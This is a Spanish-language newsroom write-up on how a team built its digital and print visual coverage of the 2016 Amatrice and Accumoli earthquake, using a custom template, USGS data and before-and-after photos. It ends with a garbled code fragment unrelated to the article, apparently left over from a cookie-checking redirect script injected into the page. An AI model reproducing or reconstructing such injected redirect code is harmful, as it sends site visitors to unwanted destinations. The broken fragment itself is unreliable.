Breaking news: Terremoto en Amatrice y Accumoli, Italia.

 > Ir a la cobertura del terremoto en Italia – 24/09/2016 

El principal objetivo de la cobertura visual de esta catástrofe fue poder mostrar en forma sencilla la ubicación de los pueblos afectados por el terremoto, las consecuencias edilicias y la cantidad de víctimas.

Para eso, utilizamos una plantilla HTML con un Javascript creada especialmente por nuestro equipo de desarrolladores. Dicha plantilla puede ser alimentada en forma simultánea por periodistas y diseñadores, pudiendo sumar desde un spreadsheet de Google, textos, mapas, fotografías, videos e iframes de distintos tipos.

La pieza visual se publicó primero en la plataforma digital (formato desktop, tablet y mobile), y al día siguiente, en la versión impresa.

DETALLE DE LA PIEZA VISUAL

Al ya tradicional mapa de ubicación con las distintas intensidades sísmicas, sumamos una vista aérea con el detalle de las zonas devastadas en el pueblo de Amatrice.

Ya subida la primer versión en la plataforma digital, se realizó una exhaustiva búsqueda fotográfica donde se buscó empalmar imágenes de un mismo lugar para poder comparar el antes y después del terremoto.

Para confeccionar el mapa de los sismos históricos de la región se accedió a los datos publicados en el sitio USGS (Instituto Geológico de los Estados Unidos). El resultado final fue un mapa que concentraba el actual sismo, sus réplicas y los movimientos sísmicos sufridos con anterioridad, constatando así lo habitual que eran en la zona.

Rapidez > Se subió la primer versión de la cobertura visual algunas horas después del sismo. Luego se fueron sumando otras piezas y/o mejorando lo ya subidas. La nota acumuló 40.230 visitas únicas en un mismo día.

Coordinación > El equipo periodístico y visual trabajó en forma simultánea en la misma plantilla logrando una rápida publicación digital y posterior indexación en Google.

  “; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}